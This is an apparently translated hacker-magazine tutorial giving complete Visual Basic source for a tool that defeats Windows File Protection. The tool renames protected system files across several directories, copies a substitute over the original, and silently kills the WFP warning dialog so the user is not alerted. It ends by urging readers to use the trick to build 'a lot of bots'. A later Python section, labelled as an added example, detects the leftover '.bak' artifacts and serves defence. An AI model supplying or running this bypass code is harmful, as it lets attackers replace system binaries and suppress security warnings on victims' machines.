Windows File Protection is so vulnerable


Author: smallras... Source: Hacker defense

I read the article "Windows File Protection is so vulnerable" (hereinafter referred to as "strategy") and wanted to try it myself, but I was afraid that the dialog box would spoil our good thing. What to do? Read this article!

"Destruction" Ideology
Let's talk about the idea first; once you have the idea, everything else can be done well. Note the title of the dialog box in "Introduction": it is "Windows File Protection". Let's start with it. There are two methods. The first is to search for the window by its title and hide it once it is found. This can be done with the ShowWindow API and the SW_HIDE constant, but the window still exists, so this is not very safe. The second method is also based on the title of the window, but after the window is found it is not hidden; it is closed directly by sending it a system message. The following example replaces a file completely and closes the dialog box, using the second method.

Interface Design
Well, we should first give the layout of each control and its corresponding properties.

Initialization
Initialization is of course the first thing to do with the program. Here, you need to declare the required APIs, constants, and variables, and obtain the complete path of the Windows directory.
'API that returns the Windows installation directory
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'API that looks up a window handle
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
'API that posts a message to the window with the given handle
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
'Message constant used to close the window
Private Const WM_QUIT = &H12
'Variable that stores the Windows directory
Dim WindowsDirectory As String

Private Sub Form_Load()
    'String buffer that receives the Windows directory
    Dim Path As String
    'Fill the buffer with spaces so the full path can be extracted from it
    Path = Space(255)
    'Get the path of the Windows directory and store it in the buffer
    Call GetWindowsDirectory(Path, 255)
    'Extract the full path: the buffer now holds the path, a null character,
    'then the remaining spaces, so the first space is two past the end of the path
    WindowsDirectory = Mid(Path, 1, InStr(1, Path, " ") - 2)
    'Full path and file name of the file to be replaced
    txtSource.Text = WindowsDirectory & "\notepad.exe"
    'Full path and file name of the replacement file
    txtDestination.Text = WindowsDirectory & "\regedit.exe"
End Sub
Then the file replacement process begins. First determine whether the file to be replaced and the replacement file exist. If they do, process the paths selected by the check boxes. The idea here is to rename every copy of the file so that it cannot be recovered, and then copy the replacement file to the replaced file, which avoids the unexpected situations that direct replacement could cause. After the replacement, activate the timer to search for the dialog box.
Private Sub cmdDo_Click()
    'Disable all controls during execution to prevent crashes caused by misoperation
    cmdDo.Enabled = False: txtSource.Enabled = False: txtDestination.Enabled = False
    chkWindows.Enabled = False: chkSystem32.Enabled = False: chkDllcache.Enabled = False: chkI386.Enabled = False
    'Set the error trap because the code below performs file operations
    On Error Resume Next
    'Check that the file to be replaced and the replacement file both exist
    If Dir(txtSource.Text) <> "" And Dir(txtDestination.Text) <> "" Then
        'Variable that stores the name of the file to be replaced
        Dim FileName As String
        'Get the name of the file to be replaced
        FileName = Mid(txtSource.Text, InStrRev(txtSource.Text, "\") + 1, Len(txtSource.Text) - InStrRev(txtSource.Text, "\"))
        'Is the Dllcache check box selected?
        If chkDllcache.Value = 1 Then
            'Yes: rename the file in dllcache
            Name WindowsDirectory & "\system32\dllcache\" & FileName As WindowsDirectory & "\system32\dllcache\" & FileName & ".bak"
        End If
        'Is the System32 check box selected?
        If chkSystem32.Value = 1 Then
            'Yes: rename the file in system32
            Name WindowsDirectory & "\system32\" & FileName As WindowsDirectory & "\system32\" & FileName & ".bak"
        End If
        'Is the I386 check box selected?
        If chkI386.Value = 1 Then
            'Yes: rename the file under i386
            Name WindowsDirectory & "\ServicePackFiles\i386\" & FileName As WindowsDirectory & "\ServicePackFiles\i386\" & FileName & ".bak"
        End If
        'Is the Windows check box selected?
        If chkWindows.Value = 1 Then
            'Yes: rename the file in the Windows directory
            Name WindowsDirectory & "\" & FileName As WindowsDirectory & "\" & FileName & ".bak"
        End If
        'Copy the replacement file over the replaced file
        FileCopy txtDestination.Text, txtSource.Text
        'Activate the timer
        timCheck.Enabled = True
    End If
End Sub
The last step is to watch continuously for the "Windows File Protection" dialog box and, as soon as it appears, close it by sending it the WM_QUIT system message through the PostMessage API. Note that PostMessage is used instead of SendMessage, mainly because there is no need to wait for the message to be processed. If SendMessage is used, the dialog box in "Introduction" cannot be closed; another dialog box is displayed instead.
Private Sub timCheck_Timer()
    'Set the error trap
    On Error Resume Next
    'Variable that stores the handle of the "Windows File Protection" window
    Dim hwnd As Long
    'Find the "Windows File Protection" window and store its handle
    hwnd = FindWindow(vbNullString, "Windows File Protection")
    'Was a window found?
    If hwnd <> 0 Then
        'Yes: close the window
        Call PostMessage(hwnd, WM_QUIT, 0, 0)
        'Success prompt
        MsgBox "Replaced successfully!", vbInformation
        'Exit the program
        End
    End If
End Sub
Now we can compile and use it.
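
Seen from the defender's side, the rename step above leaves a recognisable trace: `<name>.bak` files in the four directories, with the live file either missing or different from the renamed original. The following Python scan for that pattern is an added example, not part of the original article; the function names and the sample directory tree are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Directories the article's tool renames files in, relative to the Windows directory.
WATCHED = ["system32/dllcache", "system32", "ServicePackFiles/i386", "."]

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def find_swap_artifacts(windows_dir):
    """Report every '<name>.<ext>.bak' left in the watched directories."""
    root = Path(windows_dir)
    findings = []
    for rel in WATCHED:
        folder = root / rel
        if not folder.is_dir():
            continue
        for bak in sorted(folder.glob("*.*.bak")):
            live = bak.with_suffix("")  # notepad.exe.bak -> notepad.exe
            if not live.exists():
                state = "original renamed, no live copy"
            elif sha256(live) != sha256(bak):
                state = "live file differs from renamed original"
            else:
                state = "backup identical to live file"
            findings.append((rel, live.name, state))
    return findings

def build_sample_tree(base):
    """Constructed sample: layout after the article's tool ran on notepad.exe."""
    root = Path(base)
    for rel in WATCHED:
        (root / rel).mkdir(parents=True, exist_ok=True)
    for rel in ("system32/dllcache", "system32", "."):
        (root / rel / "notepad.exe.bak").write_bytes(b"original notepad")
    (root / "notepad.exe").write_bytes(b"regedit bytes")    # swapped-in file
    (root / "system32" / "calc.exe").write_bytes(b"calc")   # untouched file
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in find_swap_artifacts(build_sample_tree(tmp)):
            print(finding)
```

A missing dllcache copy together with a live file that differs from its `.bak` neighbour is the combination worth escalating; a `.bak` that is identical to the live file is usually an ordinary backup.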

Conclusion
In this way, WFP, with all of MS's strong security, has been broken through in a few simple steps, and I can hardly believe it myself. But it is a fact, so believe it or not. A "small" hole + a weapon = a lot of bots; I believe you will not want to miss it. Here is my blog; you are always welcome: http://smallrascal.blog.tom.com

 
